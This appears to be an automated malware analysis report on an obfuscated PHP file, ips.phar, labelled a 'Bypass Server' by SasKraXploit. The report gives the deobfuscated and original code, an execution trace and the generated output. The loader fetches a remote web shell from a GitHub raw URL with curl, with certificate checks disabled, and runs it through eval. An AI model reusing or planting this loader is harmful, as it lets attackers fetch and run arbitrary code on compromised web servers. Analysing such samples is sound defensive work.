PHP Malware Analysis
ips.phar
md5: 1d3310dfd825ad02ae27d5c5bf628ece
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Execution
- eval (Deobfuscated, Original)
URLs
- https://raw.githubusercontent.com/Saskraxploit/shell/main/wn (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
/*
Bypass Server By SasKraXploit X Indonesian Predator 2021
Thanks to :
-karma
-W4NT3K
*/
$GLOBALS["yafdnr"] = "hvfkNqlpzhXRcuerqjdZ";
$GLOBALS["hyokzipym"] = "NUwGojaMFrWOXnaoPPXm";
$GLOBALS["ypjsezxo"] = "SCvWTGyfCYyeLdjcFFzo";
$GLOBALS["sLErLvRClfMwlwzfmZia"] = "https://raw.githubusercontent.com/Saskraxploit/shell/main/wn";
$GLOBALS["voBIXqddThsMvzHcUXzW"] = "coki";
$GLOBALS["TcxoXNboAIbTBtucYEXv"] = "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0";
$GLOBALS["SnsSSwMKZSYeMFnEirnh"] = "";
function QBBTMsykcviWncPerRkb($gXNjWLFkUQOugyREMXKv)
{
$GLOBALS["djrwfutdivx"] = "NUwGojaMFrWOXnaoPPXm";
$GLOBALS["kyugkupss"] = "SCvWTGyfCYyeLdjcFFzo";
$egjidpo = "SCvWTGyfCYyeLdjcFFzo";
$GLOBALS["pgkandya"] = "SCvWTGyfCYyeLdjcFFzo";
$GLOBALS["bdclkhnbm"] = "gXNjWLFkUQOugyREMXKv";
$SCvWTGyfCYyeLdjcFFzo = curl_init($GLOBALS["SnsSSwMKZSYeMFnEirnh"] . $gXNjWLFkUQOugyREMXKv . $GLOBALS["SnsSSwMKZSYeMFnEirnh"]);
$pdsfhqkte = "SCvWTGyfCYyeLdjcFFzo";
$nsbifh = "SCvWTGyfCYyeLdjcFFzo";
$GLOBALS["yjcvttcg"] = "SCvWTGyfCYyeLdjcFFzo";
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1);
$xmlxsygsmr = "SCvWTGyfCYyeLdjcFFzo";
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_USERAGENT, $GLOBALS["TcxoXNboAIbTBtucYEXv"]);
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_COOKIEJAR, $GLOBALS[$GLOBALS["voBIXqddThsMvzHcUXzW"]]);
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_COOKIEFILE, $GLOBALS[$GLOBALS["voBIXqddThsMvzHcUXzW"]]);
$NUwGojaMFrWOXnaoPPXm = curl_exec($SCvWTGyfCYyeLdjcFFzo);
return $NUwGojaMFrWOXnaoPPXm;
}
$hvfkNqlpzhXRcuerqjdZ = QBBTMsykcviWncPerRkb($GLOBALS["sLErLvRClfMwlwzfmZia"]);
eval("?>" . $hvfkNqlpzhXRcuerqjdZ);Execution traces
data/traces/1d3310dfd825ad02ae27d5c5bf628ece_trace-1676249166.2127.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:46:32.110582]
1 0 1 0.000181 393512
1 3 0 0.000344 412344 {main} 1 /var/www/html/uploads/ips.phar 0 0
1 A /var/www/html/uploads/ips.phar 10 GLOBALS['yafdnr'] = 'hvfkNqlpzhXRcuerqjdZ'
1 A /var/www/html/uploads/ips.phar 10 GLOBALS['hyokzipym'] = 'NUwGojaMFrWOXnaoPPXm'
1 A /var/www/html/uploads/ips.phar 10 GLOBALS['ypjsezxo'] = 'SCvWTGyfCYyeLdjcFFzo'
2 4 0 0.000405 412344 base64_decode 0 /var/www/html/uploads/ips.phar 10 1 'aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1Nhc2tyYXhwbG9pdC9zaGVsbC9tYWluL3du'
2 4 1 0.000424 412488
2 4 R 'https://raw.githubusercontent.com/Saskraxploit/shell/main/wn'
1 A /var/www/html/uploads/ips.phar 10 GLOBALS['sLErLvRClfMwlwzfmZia'] = 'https://raw.githubusercontent.com/Saskraxploit/shell/main/wn'
2 5 0 0.000458 412456 base64_decode 0 /var/www/html/uploads/ips.phar 10 1 'Y29raQ=='
2 5 1 0.000472 412528
2 5 R 'coki'
1 A /var/www/html/uploads/ips.phar 10 GLOBALS['voBIXqddThsMvzHcUXzW'] = 'coki'
2 6 0 0.000498 412496 base64_decode 0 /var/www/html/uploads/ips.phar 10 1 'TW96aWxsYS81LjAoV2luZG93cyBOVCA2LjE7IHJ2OjMyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMzIuMA=='
2 6 1 0.000516 412656
2 6 R 'Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0'
1 A /var/www/html/uploads/ips.phar 10 GLOBALS['TcxoXNboAIbTBtucYEXv'] = 'Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0'
2 7 0 0.000551 412624 base64_decode 0 /var/www/html/uploads/ips.phar 10 1 ''
2 7 1 0.000564 412688
2 7 R ''
1 A /var/www/html/uploads/ips.phar 10 GLOBALS['SnsSSwMKZSYeMFnEirnh'] = ''
2 8 0 0.000590 412632 QBBTMsykcviWncPerRkb 1 /var/www/html/uploads/ips.phar 10 1 'https://raw.githubusercontent.com/Saskraxploit/shell/main/wn'
2 A /var/www/html/uploads/ips.phar 10 GLOBALS['djrwfutdivx'] = 'NUwGojaMFrWOXnaoPPXm'
2 A /var/www/html/uploads/ips.phar 10 GLOBALS['kyugkupss'] = 'SCvWTGyfCYyeLdjcFFzo'
2 A /var/www/html/uploads/ips.phar 10 $egjidpo = 'SCvWTGyfCYyeLdjcFFzo'
2 A /var/www/html/uploads/ips.phar 10 GLOBALS['pgkandya'] = 'SCvWTGyfCYyeLdjcFFzo'
2 A /var/www/html/uploads/ips.phar 10 GLOBALS['bdclkhnbm'] = 'gXNjWLFkUQOugyREMXKv'
3 9 0 0.000670 413008 curl_init 0 /var/www/html/uploads/ips.phar 10 1 'https://raw.githubusercontent.com/Saskraxploit/shell/main/wn'
3 9 1 0.000692 413952
3 9 R resource(4) of type (curl)
2 A /var/www/html/uploads/ips.phar 10 $SCvWTGyfCYyeLdjcFFzo$egjidpoSCvWTGyfCYyeLdjcFFzo = resource(4) of type (curl)
2 A /var/www/html/uploads/ips.phar 10 $pdsfhqkte = 'SCvWTGyfCYyeLdjcFFzo'
2 A /var/www/html/uploads/ips.phar 10 $nsbifh = 'SCvWTGyfCYyeLdjcFFzo'
2 A /var/www/html/uploads/ips.phar 10 GLOBALS['yjcvttcg'] = 'SCvWTGyfCYyeLdjcFFzo'
3 10 0 0.000768 413920 curl_setopt 0 /var/www/html/uploads/ips.phar 10 3 resource(4) of type (curl) 19913 1
3 10 1 0.000784 414016
3 10 R TRUE
2 A /var/www/html/uploads/ips.phar 10 $xmlxsygsmr = 'SCvWTGyfCYyeLdjcFFzo'
3 11 0 0.000809 413920 curl_setopt 0 /var/www/html/uploads/ips.phar 10 3 resource(4) of type (curl) 52 1
3 11 1 0.000824 414016
3 11 R TRUE
3 12 0 0.000837 413920 curl_setopt 0 /var/www/html/uploads/ips.phar 10 3 resource(4) of type (curl) 10018 'Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0'
3 12 1 0.000855 414016
3 12 R TRUE
3 13 0 0.000868 413920 curl_setopt 0 /var/www/html/uploads/ips.phar 10 3 resource(4) of type (curl) 64 0
3 13 1 0.000882 414016
3 13 R TRUE
3 14 0 0.000895 413920 curl_setopt 0 /var/www/html/uploads/ips.phar 10 3 resource(4) of type (curl) 81 0
3 14 1 0.000911 414016
3 14 R TRUE
3 15 0 0.000946 413920 curl_setopt 0 /var/www/html/uploads/ips.phar 10 3 resource(4) of type (curl) 10082 NULL
3 15 1 0.000980 414016
3 15 R TRUE
3 16 0 0.001009 413920 curl_setopt 0 /var/www/html/uploads/ips.phar 10 3 resource(4) of type (curl) 10031 NULL
3 16 1 0.001029 414016
3 16 R TRUE
3 17 0 0.001050 413920 curl_exec 0 /var/www/html/uploads/ips.phar 10 1 resource(4) of type (curl)
3 17 1 0.036710 414208
3 17 R '404: Not Found'
2 A /var/www/html/uploads/ips.phar 10 $NUwGojaMFrWOXnaoPPXmNUwGojaMFrWOXnaoPPXm = '404: Not Found'
2 8 1 0.037028 413264
2 8 R '404: Not Found'
1 A /var/www/html/uploads/ips.phar 10 $hvfkNqlpzhXRcuerqjdZhvfkNqlpzhXRcuerqjdZ = '404: Not Found'
2 18 0 0.037099 413800 eval 1 '?>404: Not Found' /var/www/html/uploads/ips.phar 10 0
2 18 1 0.037115 413800
1 3 1 0.037123 413392
0.037171 329152
TRACE END [2023-02-12 22:46:32.147610]
Generated HTML code
<html><head></head><body>404: Not Found</body></html>Original PHP code
<?php
/*
Bypass Server By SasKraXploit X Indonesian Predator 2021
Thanks to :
-karma
-W4NT3K
*/
${"\x47L\x4f\x42\x41\x4cS"}["\x79a\x66\x64\x6e\x72"]="\x68v\x66\x6b\x4e\x71\x6c\x70zh\x58\x52\x63\x75\x65\x72q\x6ad\x5a";${"G\x4c\x4fBA\x4cS"}["\x68\x79\x6fkzi\x70ym"]="N\x55\x77\x47\x6fj\x61\x4d\x46r\x57\x4f\x58n\x61\x6fPPX\x6d";${"G\x4cOBAL\x53"}["y\x70\x6a\x73ez\x78\x6f"]="\x53\x43\x76\x57\x54\x47y\x66\x43Y\x79\x65Ld\x6ac\x46\x46\x7ao";$GLOBALS["s\x4cE\x72L\x76R\x43lf\x4dw\x6cw\x7a\x66mZi\x61"]=base64_decode("\x61H\x520\x63\x48\x4d6Ly\x39\x79\x59\x58c\x75\x5a2l0a\x48\x56i\x64XN\x6c\x63mN\x76b\x6e\x52\x6cb\x6e\x51\x75Y\x32\x39t\x4c1\x4ehc2t\x79\x59\x58h\x77\x62\x479\x70\x64\x439z\x61\x47Vs\x62C9t\x59Wl\x75\x4c\x33\x64\x75");$GLOBALS["\x76oB\x49\x58\x71d\x64\x54\x68sMvzH\x63U\x58\x7aW"]=base64_decode("\x592\x39r\x61Q\x3d=");$GLOBALS["T\x63x\x6f\x58N\x62\x6fAI\x62TB\x74\x75\x63\x59E\x58\x76"]=base64_decode("\x54\x57\x39\x36\x61W\x78\x73\x59S\x381\x4cjA\x6fV\x32\x6c\x75\x5a\x47\x393\x63y\x42O\x56\x43\x412LjE\x37\x49\x48\x4a2\x4f\x6aMy\x4cjA\x70\x49E\x64\x6cY2tv\x4czI\x77M\x54A\x77M\x54\x41\x78I\x45Z\x70c\x6dVm\x623\x67\x76\x4d\x7aI\x75\x4dA\x3d=");$GLOBALS["\x53\x6e\x73\x53\x53\x77\x4dK\x5a\x53YeMF\x6eE\x69\x72n\x68"]=base64_decode("");function QBBTMsykcviWncPerRkb($gXNjWLFkUQOugyREMXKv){${"\x47LO\x42\x41\x4c\x53"}["\x64\x6a\x72\x77\x66u\x74d\x69\x76\x78"]="\x4eU\x77G\x6f\x6a\x61M\x46\x72\x57\x4f\x58n\x61\x6f\x50\x50\x58\x6d";${"\x47\x4cO\x42\x41L\x53"}["\x6b\x79\x75\x67\x6b\x75\x70\x73s"]="S\x43\x76WT\x47\x79\x66C\x59\x79e\x4cd\x6a\x63FFzo";$egjidpo="\x53\x43v\x57T\x47\x79\x66\x43Y\x79eL\x64\x6a\x63F\x46\x7a\x6f";${"GL\x4f\x42\x41L\x53"}["\x70\x67\x6b\x61\x6edya"]="\x53\x43\x76\x57T\x47\x79f\x43\x59y\x65\x4cd\x6ac\x46\x46z\x6f";${"\x47\x4c\x4fBALS"}["\x62dcl\x6b\x68\x6e\x62m"]="\x67\x58\x4ejW\x4c\x46k\x55\x51\x4f\x75g\x79\x52\x45\x4dX\x4b\x76";${$egjidpo}=curl_init($GLOBALS["\x53nsSS\x77M\x4bZSY\x65MF\x6e\x45\x69\x72\x6eh"].${${"G\x4c\x4fBAL\x53"}["\x62\x64\x63l\x6b\x68\x6e\x62\x6d"]}.$GLOBALS["\x53\x6e\x73\x53Sw\x4dKZ\x53Y\x65MF\x6e\x45\x69\x72\x6eh"]);$pdsfhqkte="\x53\x43v\x57\x54G\x79\x66CY\x79\x65\x4c\x64\x6a\x63\x46\x46\x7a\x6f";$nsbifh="\x53C\x76WT\x47y\x66CY\x79e\x4cd\x6ac\x46Fzo";${"\x47LOB\x41\x4c\x53"}["\x79\x6ac\x76\x74\x74\x63\x67"]="\x53Cv\x57\x54\x47y\x66CY\x79\x65\x4c\x64\x6a\x63\x46\x46\x7a\x6f";curl_setopt(${${"G\x4c\x4fBA\x4c\x53"}["p\x67k\x61n\x64\x79a"]},CURLOPT_RETURNTRANSFER,1);$xmlxsygsmr="\x53\x43vW\x54Gy\x66C\x59\x79\x65\x4c\x64jcFF\x7ao";curl_setopt(${$nsbifh},CURLOPT_FOLLOWLOCATION,1);curl_setopt(${${"GL\x4fB\x41\x4cS"}["\x79\x70jse\x7a\x78\x6f"]},CURLOPT_USERAGENT,$GLOBALS["\x54cx\x6fXNbo\x41\x49\x62\x54B\x74\x75\x63\x59EX\x76"]);curl_setopt(${$xmlxsygsmr},CURLOPT_SSL_VERIFYPEER,0);curl_setopt(${${"\x47\x4c\x4fB\x41\x4cS"}["\x6b\x79u\x67k\x75p\x73s"]},CURLOPT_SSL_VERIFYHOST,0);curl_setopt(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x79j\x63\x76\x74\x74\x63g"]},CURLOPT_COOKIEJAR,$GLOBALS[$GLOBALS["v\x6fBI\x58qd\x64T\x68s\x4d\x76z\x48c\x55Xz\x57"]]);curl_setopt(${$pdsfhqkte},CURLOPT_COOKIEFILE,$GLOBALS[$GLOBALS["v\x6fBI\x58\x71\x64d\x54\x68s\x4dv\x7a\x48c\x55\x58z\x57"]]);${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x64j\x72\x77f\x75\x74d\x69\x76x"]}=curl_exec(${${"\x47\x4c\x4f\x42\x41\x4cS"}["yp\x6as\x65\x7a\x78\x6f"]});return${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x68\x79\x6f\x6b\x7ai\x70\x79\x6d"]};}${${"\x47L\x4f\x42\x41\x4c\x53"}["\x79\x61fdn\x72"]}=QBBTMsykcviWncPerRkb($GLOBALS["sLE\x72L\x76\x52C\x6cf\x4d\x77l\x77z\x66m\x5a\x69a"]);eval("?\x3e".${${"GLO\x42\x41\x4cS"}["ya\x66\x64\x6e\x72"]});
?>